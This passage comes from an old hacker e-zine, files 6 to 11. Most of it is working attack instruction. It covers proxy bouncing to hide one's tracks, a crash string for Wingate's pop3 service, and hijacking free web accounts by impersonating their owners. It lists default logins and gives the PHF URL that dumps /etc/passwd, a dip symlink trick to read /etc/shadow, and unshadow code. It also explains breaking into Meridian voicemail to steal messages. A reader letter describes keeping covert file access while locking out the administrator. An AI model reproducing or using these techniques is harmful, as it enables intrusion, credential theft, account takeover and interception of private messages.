time they are contacted by the victim down the line of sysadmins. Also, use a guest account. If your victim does manages to weave his way through your multiple connection he will eventually hit a dead end. So by now you must be convinced that bouncing is a good idea. To use a proxy through your web browser, in Netscape, click on Options|Network Preferences then click on the 'Proxies' tab and check the radio button 'Manual Proxy config' and then click the 'view' button. Set it up for whatever protocols you want, (some proxies might only support HTTP) probably FTP and HTTP. In Internet Explorer, click View|Options| then click on the 'Connection' tab and set it up with Netscape. *** Wingate Bouncing Wingate is a program for Windows which allows you to connect a whole network to the internet, bearing all the net traffic on one computer. In short, it is just another proxy program. However, it is very popular for its use by hackers. Its flaws allow you to bounce to it from the standard telnet port 23. This means you can use all the telnet commands from your connection. Port 23 is open from the basic system preferences. It can be blocked or restricted to password access only, but comes open by default. You can telnet to port 23 on any wingate system. It will then give you the WinGate> prompt. You can then telnet from there to any other system: WinGate>proxy.compuserve.com:23 Wingate IPs are very handy to have so I recommend you start scanning for them right away. What a wingate scanner does is open port 23 on a computer and scan for the string WinGate> That is not the only thing wrong with Wingate. If you are an OP in an IRC channel and you suspect someone is wingating you can crash them off the internet. The bug is pretty straight forward, telnet to the server at its pop3 port and then type in: USER x#99999..... Type as many nines as possible, this will crash the buffer overflow. It might be important for you to know that all these tricks only work if the sysadmin is too lazy to bother fixing them. Here is eight steps if you are reading this file to help secure your Wingate: 1 - Open GateKeeper and log into Wingate as Administrator. 2 - Double click on Policies, and double click on "Default Policies". 3 - Select the right "Users can access services". 4 - There will be one recipient there - "Everyone". Double click on this recipient. 5 - Select the Location tab. 6 - Select "Specify locations from where this recipient has rights". 7 - Add 127.0.0.1 and the entries of your main network card. 8 - Hit OK, and remember to save changes. Now only your LAN users can access any service in Wingate. If some of your services are using their own rules rather than the global ones, you can perform this action for each recipient in those service specific rules. Well I hope this has been an informative read. If you would like to e-mail me regarding anything in this file then go ahead. If you are interested in hacking, phreaking or programming then e-mail me or visit my website: cyborg@disinfo.net http://cyborg.ie.8m.com :..::..End Of File..::..: :..::..File 7 Of 11.::..: :.:.Breaking Accounts.:.: :..::.:.By HitMan.:.::..: <*> The main question I would ask about doing this illegal activity is why? But for the purpose of hacking I will ask no further questions and presume that you are trying to get revenge on the leader of a child porn racket or some other perverse organisation. And if it is for the child porn reason let me know how you get on as I am highly against any type of child porn and the likes. With this I don't by any means mean just any old type of account I mean the free one you get just like a tripod account or xoom. With that in mind I must tell you that this is a long process in getting access but if you feel it's worth it then by all means go and do it. Did you ever notice that when registering with tripod they send you all heap of shit such as username/password over e-mail. So basically you have to follow a few but still simple steps in doing this. First find out as much as you can about the target such as their name current e-mail address that kind of thing, with that you build up a profile on the target and use this against them. Now create a free e-mail address with yahoo (or any one you want) using the targets details. For example the targets name is Dohn Divine and lives in 38 Cowper Downs, Rathmines, Dublin 14, Ireland (Made up name and address). Just use this as the data you enter when setting up the account. Now e-mail the web-master in tripod and just simply let them know that you (John Divine..........) has now changed your e-mail address to jdivine@yahoo.com (or whatever) and that they should change their records etc. New username: johndivine New e-mail address: jdivine@yahoo.com Now with this a few months down the road e-mail them saying that you have forgotten your password. Now they will send you a new password to the given e-mail address (Which in this case would be the one you made). This will then in turn give you 100% access to their account. You can just do it as soon as you change the e-mail address but this could fail for two reasons A) They will think it's too soon and get a bit suspect of your activities. B) It will be to soon and the record will not be updated for a couple of days. /-----------\ /-----------\ /-----------\ | | | | | | | Account |-------| Original |------| Provider | | | | | E-mail | | | | | | | | | | | | \-----------/ | \-----------/ | \-----------/ | | | | | /-----------\ | | | | | |---| New |---| | E-mail | | | \-----------/ If you have any questions on this feel free to mail me about your problems and I'll be more than happy to awnser your questions. [-=http://hitman.ie.8m.com=-] [-=vectra500@geocities.com=-] :..::..End Of File..::..: :..::..File 8 Of 11.::..: :.Cracking Passwd Files.: :..::...By Cyborg...::..: <*> Introduction: This file deals with unix passwd files and how to obtain and crack them. It is not meant as an ultimate guide. It deals with many aspects of passwd protection. *** Starting Off Most FTP servers have the directory /pub which stores all the 'public' information for you to download. But alongside /pub you will probably find other directories such as /bin and /etc its the /etc directory which is important. In this directory there is normally a file called passwd. This looks something like this: root:7GHgfHgfhG:1127:20:Superuser jgibson:7fOsTXF2pA1W2:1128:20:Jim,,,,,,,:/usr/people/jgibson:/bin/csh tvr:EUyd5XAAtv2dA:1129:20:Tovar:/usr/people/tvr:/bin/csh mcn:t3e.QVzvUC1T.:1130:20:Greatbear,,,,,,,:/usr/people/mcn:/bin/csh mouse:EUyd5XAAtv2dA:1131:20:Melissa P.:/usr/people/mouse:/bin/csh This is where all the user names and passwords are kept. For example, root is the superuser and the rest are normal users on the site. The bit after the word root or mcn such as in this example (EUyd5XAAtv2dA) is the password but it is encrypted with the one-way DES encryption standard. So you use a password cracker. I recommend John The Ripper because it is the best. You can easily find that by typing it in at a search engine. Not that a decoy unix password is sometimes stored in /home/ftp/etc/passwd to mislead people. *** Obtaining The Passwd File First of all, the file is stored in /etc/passwd so that is where you are going to get it from. To get it you need to be able to login to the the system. The most common way of doing this is through FTP. The standard FTP port is 21. So load up your favourite FTP program and connect to the desired server as anonymous login. Now browse into /etc/passwd where the file is stored. Take note that sometimes the passwords are stored in /etc/pwd.db More often than not the server won't allow anonymous logins or places restrictions on accessing the /etc/passwd directory. In this case try the following backdoors: root | root sys | sys sys | bin sys | system daemon | daemon uucp | uucp tty | tty test | test unix | unix bin | bin adm | adm adm | admin sysman | sysman sysman | sys sysadmin | sysadmin sysadmin | sys sysadmin | system sysadmin | admin sysadmin | adm who | who learn | learn uuhost | uuhost guest | guest host | host nuucp | anon nuucp | nuucp rje | rje sync | sync admin | admin games | games games | player sysop | sysop root | sysop demo | demo sysbin | sysbin mountfsys | mountfsys *** Guide to PHF The PHF (packet handler function) white pages directory services program distributed with the NCSA httpd, versions 1.5a and earlier, and also included in the Apache distribution prior to version 1.0.5, passes unchecked newline (hex 0a) characters to the Unix shell. The phf phone book script file in the cgi-bin directory can be exploited to give you the password (etc/passwd) file in Unix systems. To use PHF you enter the following command line into any web browser: http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd This takes you to the /etc/passwd file of the target computer. If you get a 404 error, file not found then the domain isn't vunerable. Sometimes you can be logged trying trying PHF queries but in most cases the domain doesn't report it. *** Shadowed Passwords Shadowed password files are where things start to become a little trickier. This type of passwd file is impossible to crack. The real encrypted passwords are stored in different files on different systems. Here is a made-up example of a normal passwd entry: root:R0rmc6lx78Vwi5I:0:0:root:/root:/bin/bash Now here is that entry again, only shadowed: root:x:0:0:root:/root:/bin/bash You can find the shadowed passwords in these directories according to their system: Version Path Token <*>-----------------------------------------------------------------<*> AIX 3 /etc/security/passwd ! " " /tcb/auth/files// A/UX 3.0s /tcb/files/auth/?/* BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files// SunOS4.1+c2 /etc/security/passwd.adjunct ##username SunOS 5.0 /etc/shadow System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] * UNICOS /etc/udb * On some Linux Slackwares you can use dip to exploit root, it can also be used to get the shadow file. ln -s /etc/shadow /tmp/dummy.dip /sbin/dip -v /tmp/dummy.dip If dip is vulnerable this will show the shadow file. There is another alternative, you can unshadow the passwd file with the following famous C source code: <*>-------------------------< Unshadow.c >--------------------------<*> #include main() { struct passwd *p; while(p=getpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); } <*>-------------------------< Unshadow.c >--------------------------<*> Well I hope this has been an informative read. If you would like to e-mail me regarding anything in this file then go ahead. If you are interested in hacking, phreaking or programming then e-mail me or visit my website: cyborg@disinfo.net http://cyborg.ie.8m.com :..::..End Of File..::..: :..::..File 9 Of 11.::..: :...Meridian Mail Tips..: :..::.:..By CFish.:.::..: <*> Meridian Mail Tips And Tricks For Quicker Hacking This is designed for intermediates that haven't really used meridians before. These apply to meridians that aren't direct except for the last piece of information marked "For Directs". Please note that most of this information applies to people living in the UK.z Names ~~~~~ You can often find where most of the extensions are by using names directories. Common numbers to dial for names are: (P) stands for 2 second pause. 09 [P] 11 09 [P] 14 09 [P] 144 09 [P] 158 Then when it says enter the name last name followed by first name enter something like 56637 meaning "Jones" or just a 3 or 4 random digit combo of numbers, if it says more than 1 name was found then press # again, if it then says too many names were found, then refine your search. Extensions ~~~~~~~~~~ To get at this you dial: 09 or 0* (There might be another one but I dunno) Then start guessing 3,4,5 digit extensions, mainly 4 digit but not always, if it rings then bingo you hit a valid extension, write it down, others will likely be around that area. Write as many extensions down as possible about 30 to guarantee getting a box (not necessarily but likely). Most extensions are normally in common ranges which are listed in order of commodity below: 8*** 3*** (I don't know why but 3231 seems exceedingly common on all types of Voice Mail Systems) 5*** Getting more than 1 box using compose ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ When you got one box and pass, you log in and press 75 for compose, now start guessing boxes, if it says mailbox **** or some name then you hit a valid box, this is like 09 and 0* but you need to log in, it is quicker though and you can get hundreds of valid box numbers in minutes inside your box you can use 0* and 09, these are sometimes outdials. Surveillance ~~~~~~~~~~~~ If you find a system of interest i.e. Nokia Meridian Mail, in which 90% of passwords are default (box number) and you want to listen to their messages esp new ones without it saying "Read" when they check their box which would make them very suspicious you can listen to their messages another way, you could of course read then delete but that causes suspicion too. How to be subtle: 1. Get yourself a box that hasn't been checked for months 2. Change the password (84) 3. Now 81 to log in 4. Go through people's mailboxes and forward all mail to your box number (73) e.g. Log in It says you have 2 new msgs Now type 73 Type your box number then ## Press 5 Say What box number the msgs you nicked are from, then the message number. Press # Press 79 **Now for message 2** Press 6 then repeat 5. Logout of other box 6. Log in to your own box 7. You have their messages!! **To check that it works press 81 then log in to the box you nicked the msgs from and it will say you have 2 new messages still! Difficulty logging in?? ~~~~~~~~~~~~~~~~~~~~~~~ If you have hit a meridian but you cant log in, then you can probably log in using the following ways: 1. As soon as you dialed the number press 09 (It might slam you to the log in prompt) 2. Call any extension then press ##81. 3. Press ##81. 4. Find the extension that takes you the log in bit (e.g. in the Nokia one it was 5555). Likely ones are 1111, 2222, 3333, 4444, 5555, 6666, 7777, 8888, 9999, 0000, 1000, 2000, 3000, 4000, 5000, 6000, 7000, 8000, 9000 or things like 5005 or 6005 and stuff, if necessary scan 999 numbers until you find it. 5. Hand scan the number around the meridian you have got to see if there is a direct. (Scan 50-100 either way) For Directs ~~~~~~~~~~~ When you call up a direct e.g. 0800-899-050 it can be just slightly pissing off when you don't know whether the boxes are 3, 4, 5 digits long or whether they start with 5 or 8 or 3? What you can do is guess at a box and try to log in 3 times with a shit password. It may then suspend the account temporarily (48hrs approx). Try this with box 0593 or 0594 (My old boxes) and on the fourth attempt it will boot you from the system automatically in 1 go, this will tell you if you have a valid box. CFish http://ukpk.8m.com cfish999@hotmail.com :..::..End Of File..::..: :..::.File 10 Of 11.::..: :.:..Letters\Feedback.:.: :..::...By Readers..::..: <*> This is the part of the e-zine where we respond to e-mails and questions and stuff. This section is meant to add a personal touch to the e-zine. The original mail headers have been left in, as we aren't going to protect people who send us lame messages. Keep those intelligent e-mails flowing in. Everybody likes a bit of encouragement. The e-mails are arranged in the order of the date they were received. :..::.Coincidence?..::..: From: Athanasios Oikonomou To: cyborg@disinfo.net Subject: OSA i read your article in one of the e-zines i downloaded. The desktop surveillance program u wrote about, that appears as OSA seems to be installed by Microsoft Office. if it is a logger, could u tell me where the log file is , so that i can see it, or is the name just a coincidence? Thanks for your time Thanos <*> <*> <*> <*> <*> <*> The reason Desktop Surveillance appears on the Task List as OSA is done on purpose so that people will confuse it with the Office Setup Application, a small program that is used in setting up MS Office. By doing this there would be less chance of someone interuptting it by closing it on the task list. :..::..Subscription.::..: From: Daniela To: under_p@yahoo.com Subject: subscribe Hello, is there any way to subscribe to your e-zine, because I can't DWL it from your site without user name and password. Have a nice day, Daniela <*> <*> <*> <*> <*> <*> The website is not passworded. It must just be something running on your box that is stopping you. You probably saw the paragraph in the Introduction about our new subscription list. Alternatively you could try downloading from one of the websites in our distributor list. :.::.Have Some Files.::.: From: ZxZZT0PZxZ@aol.com To: under_p@yahoo.com Subject: LeechFTP I thought you might like to include this with your d/l's. It's a nice FTP prog. There is a detailed help file included. Upon unzipping it will self install to your program files unless you specify otherwise. I have scanned each file with Norton 5 and found it to be virus free. T0p Attachment Content-Type: application/zip; name=FTP.ZIP Content-Disposition: inline; Content-Transfer-Encoding: base64 <*> <*> <*> <*> <*> <*> Thanks for the gesture but zipped copies of issues are the only downloads on the site. You should build your own website. I'd help but I'm too busy and all. You could then upload this magazine and become a distributor for us. :.:..Permanent Access.:.: From: "Squish" To: Subject: Perminent Access No, major hacking trick here. Most hackers have a password cracker or can gain access to systems easily enough, but if the victim changes their password frequently, what can you do instead of re-discovering it all the time? If for instance your school network is like mine Using a login prompt before opening your desktop it's quite easy. Logon as your victim with their password. Load up 'My Computer' and then enter Server13. Open the 'Users' folder. Click on 'All Users' Right click on their account name. Go to 'Properties' Click on 'Security' Click on 'Add' Click 'Show users' Click on your own account name. Select 'Full Control' from the scroll bar below. Click on 'Add' That's it. You can access that users files from your own desktop no matter what. I recommend however, that you delete the administrators access to their files otherwise he'll cancel your access and we can't have that. After all. Out smarting other people is really what hacking is all about. Catch ya' later Skwish1404 E-mail Squish.Nation@Virgin.Net Website http://Squish.Freeservers.Com (none hacker site) <*> <*> <*> <*> <*> <*> We're always happy to recieve snippets of useful information. If you could think of more tips and tricks like that then maybe you'd have enough for a file. In which case get back to us and we'd publish it. :.:.::.EUA Monthly.::.:.: From: "jastel marrell" To: under_p@yahoo.com Subject: zine greets, I am archive. I am in the process of currently d/l'ing your zine. Currently I publish the EUA monthly, a zine on the similar topic of h/p. If you want to grab a copy of our zine you can get it off of our site at www.freespeech.org/eua --> follow the links to the zine. We do our pub in pdf format. various writters provide articles to us as well as information from the EUA's own information networks around the world. You can respond here for further information or contact me on irc.xnet.org in #eua. l8r archive Get Your Private, Free Email at http://www.hotmail.com <*> <*> <*> <*> <*> <*> After reading EUA and dropping into #eua I came to the conclusion that archive and his group are very intelligible people. EUA monthly will be reviewed in the next issue of Up so look out for that. :.::.Zed's Dead Baby.::.: From: -= ZED =- To: cyborg@disinfo.net Subject: Cyborg, I read an artical you wrote for a zine called up. It was about pirate radio. If you could explain to me in more detail how to actually broadcast the radiostation(hook up the radio to an aerial. Thanks z Get Your Private, Free Email at http://www.hotmail.com <*> <*> <*> <*> <*> <*> Sorry but the Pirate Radio Series is only meant as a general guide. I've since been asked specific questions by many people but I don't have the time to answer them in detail. The information is available to anyone who can use a search engine. All you need is time and patience. :..::..End Of File..::..: :..::.File 11 Of 11.::..: :.::.:..Disclaimer.:.::.: :.::.:.By Up Staff.:.::.: <*> Use this information at your own risk. Staff or contributors to Up, nor the persons providing this e-zine, will NOT assume ANY responsibility for the use, misuse, or abuse, of the information provided herein. The previous information is provided for educational purposes ONLY. The information is NOT to be used for illegal purposes. By reading this e-zine you ARE AGREEING to the following terms: I understand that using this information is illegal. I agree to, and understand that I am responsible for my own actions. If I get into trouble using this information for the wrong reasons, I promise not to place the blame on Up staff, contributors, or anyone that provided this e-zine. I understand that this information is for educational purposes only. Thanks for reading. ________ __ __ ______ ______ ___ __ ____ |__ __| | | | | | ___| | ___| | \ | | | _ \ | | | |_| | | |__ | |__ | \ | | | | | \ | | | _ | | __| | __| | |\ \| | | | | | | | | | | | | |___ | |___ | | \ | | |_| / |__| |__| |__| |______| |______| |__| \___| |____/ :..::..End Of File..::..: